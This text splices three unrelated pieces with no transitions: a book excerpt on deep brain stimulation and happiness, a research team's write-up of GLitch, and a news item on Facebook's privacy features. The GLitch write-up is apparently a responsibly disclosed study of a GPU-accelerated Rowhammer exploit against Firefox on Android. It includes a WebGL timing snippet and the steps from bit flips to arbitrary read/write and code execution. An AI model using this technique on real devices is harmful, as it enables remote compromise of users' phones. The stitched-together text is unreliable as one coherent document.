The authors were asking this question because of a patient who wanted to decide the matter for himself: a 33-year-old German man who had been suffering for many years from severe obsessive-compulsive disorder and generalized anxiety syndrome. A few years earlier, the doctors had implanted electrodes in a central part of his reward system—namely, the nucleus accumbens. The stimulation had worked rather well on his symptoms, but now it was time to change the stimulator battery. This demanded a small surgical procedure since the stimulator was nestled under the skin just below the clavicle. The bulge in the shape of a small rounded Zippo lighter with the top off had to be opened. The patient went to the emergency room at a hospital in Tübingen to get everything fixed. There, they called in a neurologist named Matthis Synofzik to set the stimulator in a way that optimized its parameters. The two worked keenly on the task, and Synofzik experimented with settings from 1 to 5 volts. At each setting, he asked the patient to describe his feeling of well-being, his anxiety level, and his feeling of inner tension. The patient replied on a scale from 1 to 10.

The two began with a single volt. Not much happened. The patient’s well-being or “happiness level” was around 2, while his anxiety was up at 8. With a single volt more, the happiness level crawled up to 3, and his anxiety fell to 6. That was better but still nothing to write home about. At 4 volts, on the other hand, the picture was entirely different. The patient now described a feeling of happiness all the way up to the maximum of 10 and a total absence of anxiety.

“It’s like being high on drugs,” he told Synofzik, and a huge smile suddenly spread across his face, where before there had been a hangdog look. The neurologist turned up the voltage one more notch for the sake of the experiment, but at 5 volts the patient said that the feeling was “fantastic but a bit too much.” He had a feeling of ecstasy that was almost out of control, which made his sense of anxiety shoot up to 7.

The two agreed to set the stimulator at 3 volts. This seemed to be an acceptable compromise in which the patient was pretty much at the “normal” level with respect to both happiness and anxiety. At the same time, it was a voltage that would not exhaust the $5,000 battery too quickly. All well and good.

“It’s not my job as a neurologist to make people happy.”

But the next day when the patient was to be discharged, he went to Synofzik and asked whether they might not turn the voltage up anyway before he went home. He felt fine, but he also felt that he needed to be a “little happier” in the weeks to come.

The neurologist refused. He gave the patient a little lecture on why it might not be healthy to walk around in a state of permanent rapture. There were indications that a person should leave room for natural mood swings both ways. The positive events you encounter should be able to be experienced as such. The patient finally gave in and went home in his median state with an agreement to return for regular checkups.

“It is clear that doctors are not obligated to set parameters beyond established therapeutic levels just because the patient wants it,” Synofzik and his two colleagues wrote in their article. After all, patients “don’t decide how to calibrate a heart pacemaker.”

That’s true, but there is a difference. Few laymen understand how to regulate heartbeat, but everyone is an expert on his or her own disposition. Why not allow patients to set their own moods to suit their own circumstances and desires?

Yeah, well, the three researchers reflected, it may well come to that—sometime in the future, that is—people will demand deep brain stimulation purely as a means for mental improvement.

They stressed that there is nothing necessarily unethical about raising your level of happiness this way. The problem is the lack of evidence that it is beneficial to the individual—particularly in light of the considerable cost of the treatment. Even before battery changes, which are needed every three to five years, and regular adjustments, we are talking $20,000 for the system itself and another $50,000 to $100,000 for the operation and hospital procedures.

Today, we have to ask ourselves where a “therapeutic level of happiness” might lie and whether there are risks and disadvantages connected with higher levels.

It seems the unknown young man with accumbens electrodes didn’t buy the argument because, after a short time, he stopped coming in for checkups and vanished without a trace. Maybe he found another doctor who was willing to make him happy.

Questions of pleasure and desire go right to the core of what being a human in the world is all about. The ability to stimulate selected functional circuits in the brain purposefully and precisely raises some fundamental questions for us.

What is happiness? What is a good life?

Hedonia. There is something about this word. It rolls across the tongue like walking on a red carpet and leaves a pleasant sensation behind. Hedonia might well have been the name of the Garden of Eden before the serpent made its malicious offer of wisdom and insight. And more than anything else, hedonism has become the watchword for how we should live.

The absence of joy and pleasure—anhedonia—has, in its way, become a popular issue in the wake of the disease depression. A quarter of us are affected by it over the course of a lifetime, various studies suggest, and its frequency is increasing in the industrialized world. The treatment of depression has become both a window display and a battleground for deep brain stimulation.

As soon as the electricity disappeared, the patient reported that her sense of springtime had vanished.

It was with the American neurologist Helen Mayberg and the Canadian surgeon Andres Lozano that the method got its breakthrough in psychiatry. It struck a sweet spot in the media when, in 2005, the two published the first study of deep brain stimulation for the treatment of severe chronic depression—the kind of depression, mind you, that does not respond to anything—not medicine, not combinations of medicine and psychotherapy, not electric shock. Yet suddenly, there were six patients on whom everyone had given up who got better.

At once, Helen Mayberg became a star and was introduced at conferences as “the woman who revived psychosurgery.” Later, others jumped on the bandwagon, and now they are fighting about exactly where in the brain depressed patients should be stimulated. It is not just a skirmish between large egos but a feud about what depression really is. Is it at its core a psychic pain or, rather, an inability to feel pleasure?

“It’s not my job as a neurologist to make people happy.”
 Helen Mayberg let her statement hang in the air between us before she continued.
“I liberate my patients from pain and counteract the progress of disease. I pull them up out of a hole and bring them from minus 10 to 0, but from there the responsibility is their own. They wake up to their own lives and to the question: Who am I?”

Helen Mayberg’s office spread out along the glass gable of a building at Emory University. Physically, there was something elfin about her with her brown pageboy hair, which rested on the edges of a large pair of spectacles. She was a striking, diminutive figure. But she loomed large as soon as she began to speak. Her voice was deep and intense, and she let her words flow in a gentle stream that forever meandered in different directions.

“We had a hypothesis, we set up an experiment, we laid out the data, and now we have a method that works for a great many patients.” She took a breath and lowered her voice half a tone. “But for me, it has always been about understanding depression.”

Helen Mayberg (Emory University School of Medicine)

Mayberg began her journey into the mechanisms of depression back in the 1980s—in a time when everything was all about biochemistry and transmitters. The brain was a chemical soup, and psychological symptoms were a question of “chemical imbalances.” Schizophrenia was an imbalance in the dopamine system, and the serotonin hypothesis for depression was predominant. It claimed that this oppressive illness must be due to low levels of serotonin. The hypothesis was supported by the fact that certain antidepression medications increased the level of serotonin in the brain, but the theory did not have much else to back it up.

Then something happened to change the focus. There was a breakthrough in scanning techniques, and this meant, among other things, that you could look at the activity in living brains and compare what happened inside people with different conditions. During the 1990s, Mayberg began hunting for the circuits and networks on which depression played. Others were working in the same direction, and different groups could point out that there was something wrong in the limbic system as well as the prefrontal cortex. That is, both the emotional and the cognitive regions of the brain were involved. MRI scans of people suffering from depression revealed that certain areas were too active while others were too sluggish in relation to the normal, non-depressed control subjects with whom they were compared.

Soon, Mayberg focused on a little area of the cerebral cortex with a gnarly name, the area subgenualis or Brodmann area 25. It is the size of the outermost joint of an index finger, located near the base of the brain almost exactly behind the eye sockets. Here, it is connected not only to other parts of the cortex but to areas all over the brain—specifically, parts of the reward system and of the limbic system. That system is a collection of structures surrounding the thalamus, encompassing such major players as the amygdala and the hippocampus, and often referred to as the “emotional brain.” All in all, they are brain regions involved with our motivation, our experience of fear, our learning abilities and memory, libido, regulation of sleep, appetite—everything that is affected when you are clinically depressed.

“Area twenty-five proved to be smaller in depressed patients,” Mayberg relates, adding that it also looked as though it were hyperactive. “At any rate, we could see that a treatment that worked for the depression also diminishes activity in area twenty-five.”

Desire pushes all the other systems and makes it possible to have motivated behavior and to work toward a goal.

At the same time, it was an area of the brain that we all activated when we thought of something sad, and the feeling that area 25 was a sort of “depression central” grew and grew as the studies multiplied. Mayberg was convinced that this must be the key—not just for understanding depression but also for treating those for whom nothing else worked. This was the small, tough core of patients who had not only fallen into a deep, black pit but were incapable of getting out again. These were the chronically ill for whom nothing helped, the kind of depressive patients who often wound up taking their own lives; it was this type of patient who, 50 years ago, would have been warehoused in state hospitals.

If only Mayberg could reach into their area 25!

And she could, with the help of a surgeon. Around the turn of the millennium, when she arrived at the University of Toronto, she met one of the institution’s big stars, Andres Lozano. He had not only done deep brain stimulation on several hundred Parkinson’s patients but was known as a researcher who was willing to take risks, who was eager to explore new territory. Here was something radical, and Lozano was more than intrigued. So it was simply a matter of recruiting patients. Over several months, the two partners spread the word, gave countless lectures to skeptical psychiatrists and, finally, began to get patients referred to them. One of them, a woman who had worked as a nurse before she became ill, was the first to sign up for the project. She had tried it all and did not expect an electrode to change anything. But why not give it a shot?

The operating theater was booked for May 13, 2003, and everything was made ready for the big test of Mayberg’s hypothesis as well as her scientific narcissism.

“I felt the schism between my own curiosity and the patient,” she said, holding both hands out from her body. “If something went wrong, it would be because I had asked a surgeon to do something on the basis of an idea.”

But the surgeon patted her on the back and said that she, Helen, knew more about depression than anyone on the planet. Lozano himself was not the least bit in doubt that he could place the electrode in their patient’s brain under very safe protocols.

“Ask yourself,” he said to me, “if this were your sister, would you do it?”

Mayberg would, and they went ahead. The operation itself went by the book. The patient was told that there were no particular expectations.

“Nobody knew what would happen. So the patient was instructed to tell me absolutely everything she observed. Whether it seemed relevant to her or not.”

The team began with their lowest-placed contact and 9 volts. Nothing happened. They turned up the voltage but still nothing happened. Then they went on to the next contact a half millimeter higher in the tissue. Even though they were only at 6 volts, the patient suddenly spoke. Were they doing something to her right then? she asked.

“Why do you think that? Tell me what you are feeling.”


“A sudden feeling of great, great calm.”


“What do you mean, calm?”

“It’s hard to describe, like describing the difference between a smile and laughter. I suddenly sensed a sort of lift. I feel lighter. Like when it’s been winter, and you have just had enough of the cold, and you go outside and discover the first little shoots and know that spring is finally coming.”

Then, the electrode was turned off. And as soon as the electricity disappeared, the patient reported that her sense of springtime had vanished.

Now, years later, Mayberg pulled up her knitted sleeve and held her forearm out to me. She still got goose bumps when she talked about that first time. And when I asked about how she felt there in the operating room, she did not hesitate to admit that she was close to tears.

“There was a purity to the moment.”

Later, it became clear that the reaction was not unique—other patients got the same “lift.” For one, it was as if a dust cloud around her had disappeared, while another suddenly felt there were more colors and more light in the room. Once they had experienced this immediate effect, there was a good chance that their depressive symptoms would decrease over the first months after the operation. But the lasting effect came gradually, and it had nothing to do with euphoria or happiness.

“The patients are aware I have not given them anything but have removed something that was bothering them,” said Mayberg. She liked analogies and offered me one. “It is like having one foot on the accelerator and one foot on the brake at the same time and, then, lifting your foot off the brake. Now, you can move.”

This was the core of the Emory group’s view of depression. They did not see it as a lack of anything positive—pleasure and joy—but as an active negative process. Neither did they believe you could just “inject positive” into a patient. Rather, you have to remove the constantly grinding negative activity.

When Mayberg’s landmark paper was published in Neuron in 2005 and she gave interviews to the major newspapers, the blogosphere exploded with indignant scribblings. Doctors had crossed the line! This was the return of the lobotomy!

“The conflict arises every time science reaches a new frontier. And as soon as research has anything to do with the brain, there are people who get nervous that it can be used for enhancement.”

That was my cue. I wanted to hear what Mayberg thought about joy, pleasure—hedonia. I know some groups treat depression by stimulating areas in the reward system and “injecting positive,” as she somewhat mockingly calls it. This applied, in particular, to a duo from the University of Bonn—psychiatrist Thomas Schläpfer and surgeon Volker Coenen, who virtually churn out studies reporting impressive results.

A certain tension appeared in the room. Mayberg stressed several times that Schläpfer was a “friend and a colleague,” but she also believed that he was in a strange competition with her. That it was as if he could not deal with the fact that she came first.

The treatment of depression has become both a window display and a battleground for deep brain stimulation.

“There may be plenty of people who suffer from anhedonia and who might get quite a lot out of having an electrode placed in their reward system. But if you don’t have psychological pain, I don’t believe it’s depression. If life just isn’t good enough, it won’t do anything for you to tone down area 25.”

Mayberg related the story of a patient to me. This woman had an alcohol problem in the past and, after she had her electrodes installed, she went home and waited for them to give her a sense of intoxication or euphoria. She was completely paralyzed by her expectations, and Mayberg had to explain that there was nothing to wait for. The procedure had simply awakened the lady to the realities of her life. The symptoms of her disease were diminished, but she herself had to put something in their place if she wanted to fill her life.

“Our nervous system is set up to want more and to go beyond the boundaries we run into. You don’t want just one pair of shoes, right? I fundamentally believe that you go into people’s brains in order to repair something that is broken, but there is something strangely naïve about wanting to stimulate the brain’s reward system. Ask any expert on addiction. You will wind up with people who demand more and more current.”

I asked Schläpfer about the innermost nature of depression. What did he and Coenen think about Helen Mayberg’s ideas about psychological pain needing to be extinguished, as opposed to countering anhedonia?

The big man sighed, paused for a moment, and answered by way of an anecdote from when he was studying at Johns Hopkins in Baltimore. On one of the regular hospital rounds, the old head of psychiatry at the university pointed at him and asked him to name the symptoms of depression. The dutiful Swiss student stood up straight and began to recite the nine symptoms from the textbook, when the old man interrupted.

“No, no, young Schläpfer. There is only one symptom, and it has to do with pleasure. Ask the patient what gives him pleasure, and he will tell you: nothing.”

Young Schläpfer thought about his superior’s remark and actually began to ask his patients questions. He still does. Today, he believes that anhedonia is the central symptom while everything else, including psychological pain, is something that comes in addition to that. It is only when their anhedonia abates that people suffering from depression feel better. And this is not strange, because desire and enjoyment are driving engines and a key to many of our cognitive processes. Desire pushes, so to speak, all the other systems and even makes it possible to have motivated behavior and to work toward a goal.

“I am familiar with Helen’s attitude toward the reward system,” said Schläpfer with his slow diction. “But I would like to stress that we have never seen hypomania in the patients we stimulate in the medial forebrain bundle. If we overstimulate and turn the current up too high, the worst reaction we have seen is that people get a tingling sensation as if they’d had too much coffee.”

My curiosity was piqued by what Mayberg had said about the reward system and addiction. I dove into the literature and found an article from 1986, which described a case of dependence on deep brain stimulation. The journal Pain had a so-called case history of a middle-aged American woman. In order to relieve insufferable chronic pain, she had a single electrode placed in a part of her thalamus on the right side. She was also given a self-stimulator, which she could use when the pain was too bad. She could even regulate the parameters of the current. She quickly discovered that there was something erotic about the stimulation, and it turned out that it was really good when she turned it up almost to full power and continued to push on her little button again and again.

In fact, it felt so good that the woman ignored all other discomforts. Several times, she developed atrial fibrillations due to the exaggerated stimulation, and over the next two years for all intents and purposes her life went to the dogs. Her husband and children did not interest her at all, and she often ignored personal needs and hygiene in favor of whole days spent on electrical self-stimulation. Finally, her family pressured her to seek help. At the local hospital, they ascertained, among other things, that the woman had developed an open sore on the finger she always used to adjust the current.

When deep brain stimulation is no longer experimental but an approved standard treatment, anyone can take their stimulator and pay a visit to a doctor willing to set it right where they want it. Hypomania be damned.

Lone Frank is the author of two previous books in English, My Beautiful Genome and Mindfield (Oneworld, 2009). She has also been a presenter and coproducer of several TV documentaries and is currently working on a feature-length documentary about health and deep brain stimulation. Before her career as a science writer, she earned a Ph.D. in neurobiology and worked in the U.S. biotech industry.

From the book: The Pleasure Shock by Lone Frank. Copyright © 2018 by Lone Frank. Published by arrangement with Dutton, a division of Penguin Random House, LLC.

GLitch: Rowhammer attack using the GPU


GLitch is one part of our series of Rowhammer attacks. We started by breaking the Edge browser and the cloud. Then we moved on to Android devices, showing how to root them with bit flips. This time we wanted to show that mobile phones, too, can be attacked remotely via the browser.
Meet GLitch: the first instance of a remote Rowhammer exploit on ARM Android devices. This makes it possible for an attacker who controls a malicious website to get remote code execution on a smartphone without relying on any software bug.
You want to know what makes this attack even cooler? It is carried out by the GPU. This is the first GPU-accelerated Rowhammer attack.

Wut? 🤔 How is it possible to trigger bit flips from the browser through the GPU?
The answer to this question is WebGL. WebGL is a graphics API designed to provide developers with GPU acceleration for their graphics-intensive applications. Unfortunately, as a byproduct of this API a new attack vector is introduced: the Grand Pwning Unit.

How does this sorcery work??
GLitch exploits a series of microarchitectural flaws of the system in order to leak and corrupt data. The attack can be divided into two stages:

  1. In the first stage of the attack we take advantage of a timing side channel to gain a better understanding of the (physical) memory layout of the system.
  2. In the second stage we use the information extracted from the previous part to carry out a more reliable Rowhammer attack against the browser – in our case, Firefox. For more details about the exploitation, see the technical walkthrough below.

Ok! I got the gist of it… But then why from the GPU?
The reason is that Rowhammer requires uncached memory accesses; that is, it needs to bypass the processor caches to reach DRAM. While a native attacker has more power and is allowed to bypass the caches directly, this doesn't apply to JavaScript. From JS this can be achieved only by means of cache eviction, and this technique was proven unfeasible on Android (ARM) platforms (check Drammer). Therefore we needed a different attack vector, and here is where the GPU came into play. GPU caches turned out to be nicer: their deterministic behavior made it easier for us to build low-noise side channels and remote Rowhammer attacks.

FAQs

Sooo… Am I vulnerable to this exploit?
This question doesn’t have a yes or no answer. It depends on multiple factors. First of all your phone needs to be vulnerable to Rowhammer — very vulnerable since we need to implement eviction-based Rowhammer. If you’re unlucky and your DRAM cells are worse than a colander, then the other variable you need to take into account is the GPU architecture. Our PoC heavily relies on the insights we recovered by reverse engineering the architecture of our target systems: the Snapdragon 800 and 801. This means that our PoC works only on phones  such as the LG Nexus 5, HTC One M8 or LG G2.

Wait… You are making all this fuss for phones that are 4 years old!?!? C'mon guys…
Well… Take it easy! First off, we're a university! We are not swimming in gold – feel free to donate your (old) phone btw 🙃. Second, we implemented the attack on these phones because we knew they were vulnerable to Rowhammer and we had multiple samples in the office to test against. You know… we still need to do scientific research somehow.
tl;dr This doesn't mean you're not vulnerable. Different GPU architectures require different implementations of the attack, which implies more reverse engineering effort. So we cannot tell you if your phone is vulnerable. We suspect it is possible to port our attack to different architectures, but while on some of them it may work even better, on others it may not work at all.

Ok… But I don’t use Firefox on Android (who does that anyway?) So no biggie!
Well, some people actually use it (it has Adblock 😉). But this is a bit off topic…
Anyway, I have bad news again. The exploit serves only the purpose of a proof of concept. We wanted to show how we can get control over a phone remotely, but it has nothing to do with the core of the project: microarchitectural attacks. So if you're wondering whether we can trigger bit flips on Chrome, the answer is yes, we can. As a matter of fact, most of our research was carried out on Chrome. We then switched to Firefox for the exploit just because we had prior knowledge of the platform and found more documentation (see credits).

If you’re interested in more details about the exploit or other techincal details we encourage you to read the paper or go down to the  technical walkthrough .

Demo

This demo shows GLitch in action on an LG Nexus 5 running Android 6.0.1. The video shows an attack against Firefox 57. We extract the base address of libxul.so from procfs and we show how GLitch provides us with an arbitrary read/write primitive to leak such data. The recording is taken from the Firefox Web Console — screen recording and GPU bit flips don't get along that well ¯\_(ツ)_/¯

Papers

[1] P. Frigo, C. Giuffrida, H. Bos, K. Razavi, Grand Pwning Unit: Accelerating Microarchitectural Attacks with the GPU, in: S&P, 2018.

Reception

We followed responsible disclosure and contacted the interested parties, who acknowledged the issue. The vulnerability eventually got assigned CVE-2018-10229. The Dutch NCSC helped us throughout this (lengthy) process — thanks guys 🙃.

Current browser mitigations tackle the timing channel introduced by the GPU.
Both Chrome and Firefox have disabled the EXT_DISJOINT_TIMER_QUERY WebGL extension in the latest versions of the browsers and have redesigned (or, in the case of Firefox, are planning to redesign) the WebGLSync objects to avoid high-precision timing, in line with the new WebGL specifications.

As of now there is no proposed mitigation to block the GPU-accelerated bit flips. Nonetheless, we've been discussing possible options to solve the issue directly with Google (who have been very open during the disclosure process).

Technical details:

Here you can read more about the technicalities of the project. We first analyse the GPU and we then move forward to the exploit.

The Grand Pwning Unit

If you’re wondering how is it possible to program the GPU to trigger bit flips then you should read this.

The GPU is a processor used to accelerate graphics rendering. The rendering pipeline consists of 2 main stages: geometry and rasterization. These stages are carried out by developer-provided programs called shaders. The vertex shader performs geometrical operations on vertices, while the fragment shader fills in the color of the pixels. These shaders are provided to the GPU at runtime, and this can be done from JavaScript too, thanks to WebGL.

Let’s have a look at how the GPU aids the rendering pipeline. The CPU provides the GPU with vertices as inputs (Step 0). Then the GPU runs the vertex shader on every vertex (Step 1) producing polygons as outputs (Step 2). These polygons are composed of different fragments (≊pixels). Each of these fragments then gets  modified by the fragment shader (Step 3). The fragments usually get filled with colours extracted from textures . This process is known as texture sampling. [SPOILER]  textures are big and need to be stored in DRAM. The final step is to expose the outcome to the Framebuffer (Step 4).

Now we want to build a bug-free exploit. This means that we will rely simply on microarchitectural properties of the system. For this reason we need to share resources with the CPU, which usually runs the sensitive "stuff". As you may guess, we can use texture sampling to gain access to DRAM, which is shared with the rest of the system. Even though we previously complained about the CPU caches, the GPU has caches too. However, due to their deterministic behaviour they don't pose much of a threat to our success, and we are able to systematically bypass them. This means that through texture sampling we can access DRAM and carry out the two stages of our attack.
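To make the idea of a GPU-based timing primitive more concrete, here is a minimal sketch of timing a GPU operation from JavaScript. It is not the actual GLitch code, and it assumes the EXT_disjoint_timer_query extension is still exposed (current browsers have disabled it as a mitigation, see below):

// Minimal sketch: time a draw call whose fragment shader samples a texture.
const canvas = document.createElement('canvas');
const gl = canvas.getContext('webgl');
const ext = gl.getExtension('EXT_disjoint_timer_query');
if (!ext) throw new Error('Timer queries unavailable (likely mitigated)');

function timeDraw(draw) {
  const query = ext.createQueryEXT();
  ext.beginQueryEXT(ext.TIME_ELAPSED_EXT, query);
  draw();                                  // issue the texture-sampling draw call here
  ext.endQueryEXT(ext.TIME_ELAPSED_EXT);
  gl.finish();                             // let the GPU finish the work
  // A real implementation would poll QUERY_RESULT_AVAILABLE_EXT before reading.
  return ext.getQueryObjectEXT(query, ext.QUERY_RESULT_EXT);  // elapsed time in ns
}

A fast result suggests the sampled data was served from a GPU cache, while a slow one suggests it came from DRAM; that is exactly the distinction the first stage of the attack needs.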

The GLitch exploit

If you’re interested in the details of the exploit then you’re in the right place. Here we dive into the technicalities of the attack which, even if quite Firefox specific, are really interesting to understand how to compromise a device by relying on Rowhammer.
In this walkthrough however we will only describe the actual browser exploitation. We won’t dive into the details of the Flip Feng Shui technique used to get exploitable bit flips. But we DO explain which bits are actually exploitable. So let’s start from there. Let’s have a look to our main Rowhammer primitive: type flipping. 

Type flipping
S  Exponent     Fraction (52 bits)                                      Value
0  01111111111  0111000000000000000000000000000000000000000000000000   +2^0 · (1 + 0.875)
1  11111111111  1000110001001100000001110000000000000000000111110000   NaN

The IEEE-754 specification stores double-precision floats in 64 bits using exponential notation, that is, (-1)^sign · (1.b51 b50 … b0)_2 · 2^(exp − 1023), where the MSB is the sign bit, the next 11 bits are the exponent, and the final 52 bits are the mantissa, as we show in the example above. The key concept behind type flipping is that the IEEE-754 specification treats any double having all 11 exponent bits set to 1 (and the mantissa different from 0) as a peculiar value known as Not-a-Number (NaN). This means that all 52 mantissa bits are completely useless for any mathematical computation when the exponent is set to all 1s. As a consequence, multiple JavaScript engines, among which SpiderMonkey (i.e., Firefox's JS engine), have been using NaNs to encode other values such as pointers, in order not to waste these 2^52 − 1 unused values. SpiderMonkey uses two different encodings for this purpose depending on the architecture of the system: NuN-boxing for 32-bit systems and PuN-boxing for 64-bit systems. Since our attack targets 32-bit platforms, let's have a look at NuN-boxing.

JSVAL_TAG_CLEAR  = 0xFFFFFF80,
JSVAL_TAG_INT32  = JSVAL_TAG_CLEAR | JSVAL_TYPE_INT32, // 0x01
JSVAL_TAG_STRING = JSVAL_TAG_CLEAR | JSVAL_TYPE_STRING, // 0x06
JSVAL_TAG_OBJECT = JSVAL_TAG_CLEAR | JSVAL_TYPE_OBJECT // 0x0c

1  11111111111  1111111111111000000000000000000000000000000000000000   // 0xFFFFFF80

NuN-boxing uses the first 32 bits (one word) as a tag value to identify the type of the variable. Every tag smaller than JSVAL_TAG_CLEAR identifies an IEEE-754 double of 64 bits. Bigger tag values are instead used to identify object references. In this case the first word contains details of the variable type, as represented in the snippet of /js/public/Value.h above, while the second word contains the actual pointer.
Type flipping relies on the fact that any 1-to-0 bit flip in the first 25 bits of an IEEE-754 double can transform a pointer into a double, while any 0-to-1 bit flip in the exponent bits can craft an arbitrary pointer. By exploiting this powerful property we are able to gain two extremely powerful primitives: the ability to leak any pointer (arbitrary leak) and the ability to craft any pointer of our choosing (arbitrary craft). For our attack we will use both of them, which means that we actually need two bit flips: a 1-to-0 flip for the arbitrary leak and a 0-to-1 flip for the arbitrary craft.
We trigger these bit flips on the slots of normal JavaScript arrays. These are internally known in SpiderMonkey as ArrayObjects and store data using the NuN-boxing technique. If we spray memory with ArrayObjects, we can simply fill them with marker values and then trigger the bit flips to identify the vulnerable slots: if arr[i] != MARKER after triggering the bit flip, we have found a vulnerable slot.
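To see the IEEE-754 property that type flipping abuses, here is a small, standalone illustration in plain JavaScript (not SpiderMonkey internals; the constants are made up): a 64-bit pattern whose exponent bits are all 1s is a NaN and can hide a 32-bit payload, while clearing a single exponent bit (a 1-to-0 flip) turns the same bits into an ordinary, readable double.

// Illustration only: one exponent bit separates "NaN-boxed tag + payload" from "readable double".
const buf = new ArrayBuffer(8);
const f64 = new Float64Array(buf);
const u32 = new Uint32Array(buf);  // on little-endian: u32[0] = low word, u32[1] = high word

u32[1] = 0xFFFFFF81;   // high word: sign + all-ones exponent, i.e. a NuN-box style tag
u32[0] = 0x12345678;   // low word: the 32-bit "pointer" payload
console.log(f64[0]);   // NaN; the payload cannot be read as a number

u32[1] &= ~(1 << 20);  // clear the lowest exponent bit: a 1-to-0 "bit flip"
console.log(f64[0]);   // now a finite double; the payload leaks through ordinary arithmetic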

Arbitrary read/write

We consider the attacker to be in possession of the two bit flips at two known locations within the ArrayObjects. Now we are only missing a JavaScript object that can be used to scan the memory. The obvious targets to obtain this primitive are ArrayBuffer objects.
ArrayBuffers allow an attacker to read (raw) binary data with byte granularity from memory. As a consequence we want to craft a fake ArrayBuffer which we can then reference (by using our arbitrary craft primitive).
The SpiderMonkey ArrayBufferObject class is represented as follows:

GCPtrObjectGroup group_;  // JSObject
GCPtrShape shape_;        // ShapedObject 
HeapSlots* slots_;        // NativeObject 
HeapSlots* elements_;     // NativeObject

// Slot offsets from ArrayBufferObject (two words each)
static const uint8_t DATA_SLOT = 0; 
static const uint8_t BYTE_LENGTH_SLOT = 1;
static const uint8_t FIRST_VIEW_SLOT = 2;
static const uint8_t FLAGS_SLOT = 3;

The DATA_SLOT field is what controls the memory referenced by the array buffer. Therefore, crafting a fake ArrayBufferObject header that we can then reference is the ultimate goal of our exploit. However, if we want to craft a fake object, we are required to know the internal fields of the ArrayBuffer header (i.e., group_, shape_, …).
Therefore, we need to proceed in 3 steps:

  1. We need to leak a pointer in order to break ASLR.
  2. We need an arbitrary read to leak the unknown content.
  3. We need to craft (and reference) our own fake ArrayBuffer.

So let’s go step by step.

1. Leak ASLR: Well, this is pretty trivial. We simply store a reference to the object we want to leak in the 1-to-0 vulnerable slot of the ArrayObject. Then we trigger the bit flip, et voilà: you get a used-to-be pointer that you can read as a double with a Float64Array. Now the question is which object we want to leak. Again the answer is natural: ArrayBuffers. However, we need a specific type of ArrayBuffer, one which stores its header and data inlined. Modern browsers, in order to harden against overflow exploitation, have started allocating the header and body of objects in different heaps, so that an overflow doesn't provide an attacker with control over the next object's header. However, for performance reasons SpiderMonkey keeps header and data inlined for any ArrayBuffer with a size smaller than 96 bytes. If we leak the pointer to an ArrayBuffer's header, we can therefore also derandomize the location of its data (i.e., buff+sizeof(buff_header), which is buff+0x30, as you can see from the snippet above). Knowledge of this relative offset makes it easier to craft our fake object.

2. Arbitrary Read: Now that we have derandomized the location of the ArrayBuffer's header, we want to leak that header's content. We do this by exploiting another extremely powerful JavaScript class: JSString. JSStrings are immutable, hence the read-only primitive. However, the UTF-16 standard provides us with an almost-arbitrary read. Firefox defines different types of JSStrings; we exploit a subclass known as JSAtom. Our only constraint is the non-inlined nature of the string.
Our fake JSAtom has the following structure:

class JSAtom: ... : JSString {
    struct Data {
         uint32_t    flags;     // 0x09 JSAtom
         uint32_t    length;    // sizeof(buff_header) 0x30
         char16_t*   string;    // *buff 
         } d;
}

We store the fake JSString at the beginning of the leaked ArrayBuffer, which means it is located at address buff+0x30. Now we can craft a fake reference by building a fake double that, after a 0-to-1 bit flip, will reference an object of type String. This means we craft our soon-to-be pointer double as <0x???FFF86, buff+0x30>, where the ??? depicts the future 0xFFF. After the bit flip we can reference our fake JSString, which points to the ArrayBuffer's header, leaking its content.

3. Counterfeit ArrayBuffer: Now that we have the content of our ArrayBuffer's header, we can craft our fake ArrayBuffer. We need to copy the 4 internal fields <group_, shape_, slots_, elements_>, which are needed by the JS engine itself. Then we can set the DATA_SLOT field to any memory address mapped by the process and read/write at that location. That is, we have an arbitrary read/write, as sketched below. Now we can use this to gain control over the program counter and achieve remote code execution.
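Conceptually, once the counterfeit header can be referenced, the final primitive is as simple as the following hypothetical snippet, where fakeBuffer stands for the crafted ArrayBuffer whose DATA_SLOT we control (the names are invented for illustration):

// Hypothetical final step: fakeBuffer's DATA_SLOT points at an attacker-chosen address.
const view = new DataView(fakeBuffer);
const leaked = view.getUint32(0, true);   // arbitrary read at the chosen address
view.setUint32(0, 0x41414141, true);      // arbitrary write at the same address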

Credits (where credit is due):

The complete bibliography can be found in the paper, but here we want to explicitly thank the authors of some very detailed walkthroughs that helped us in developing the exploit.
The first person we want to thank is @argp for his awesome Phrack article, which describes in detail the internals of the SpiderMonkey JavaScript engine.
Second, we want to thank the members of the phoenhex team (in particular Samuel Groß) for their very thorough exploit walkthroughs.

Finally, on a separate note, we want to thank Rob Clark for his valuable input regarding the Adreno GPU architecture.

Facebook says it really cares about your privacy this time, honest


Facebook’s annual F8 developer conference is supposed to be a showcase for all the cool new features the giant social network is either working on or busy rolling out to its two billion users—filters that turn your latest Instagram selfie into an animated picture of a dog, and so on. But not surprisingly, given all the furor over the Cambridge Analytica data leak and Mark Zuckerberg’s recent testimony before a Congress subcommittee, the latest iteration of the Facebook love-fest started on a somewhat different note.

In an attempt to lighten the mood, Zuckerberg tried to crack a joke when introducing a new feature that allows users to watch a movie or TV show with a friend and chat about it on the site. “Let’s say your friend is testifying before Congress and you want to watch,” the Facebook CEO joked awkwardly. On a more serious note, he suggested he has learned a few things about how the social network can be used for negative purposes. “I’ve learned this year that we need to take a broader view of our responsibility,” he said. “It’s not enough to just build powerful tools. We need to make sure that they are used for good.”

ICYMI: Mark Zuckerberg seems “genuinely peeved” during a recent interview

The Facebook CEO also announced a new feature that will enable users to block Facebook from tracking their behavior on the Web and through apps with Facebook access. It’s called “Clear History,” and operates much like a similar feature in most Web browsers: When clicked, it removes all of the data related to that user that is normally stored—data that is used by Facebook to help its algorithms figure out what you might be interested in, and which ads to show you (Zuckerberg pointed out that if you do enable this feature, “Facebook won’t be as good” until it gets to know you again).


This and other new privacy-related features aren’t coming about because Facebook was raked over the coals in Congress, or because it is embarrassed by the Cambridge Analytica leak. One of the main driving forces behind the changes is the need to comply with the European General Data Protection Regulation, or GDPR, which comes into effect later this month. These rules require platforms like Google and Facebook to give users more control over who has their data and what they can do with it, or face significant financial penalties.

In his testimony before Congress, the Facebook CEO was asked whether he planned to extend GDPR-like protections to non-European users of the social network, and he hedged his answer, saying some of the details were still to be worked out. The “Clear History” feature appears to be part of his attempt to introduce enough protections to satisfy regulators without actually impacting Facebook’s business—in other words, a way to eat his cake and have it, too.

ICYMI: A newspaper with no online presence to speak of

Here are some more links related to Facebook’s ongoing struggles with privacy:

  • Baby, please don’t go: In a blog post published just before the F8 conference, Zuckerberg talked about the new “Clear History” feature and how it works. “When you clear your cookies in your browser, it can make parts of your experience worse,” he noted. “You may have to sign back in to every website, and you may have to reconfigure things. The same will be true here. Your Facebook won’t be as good.”
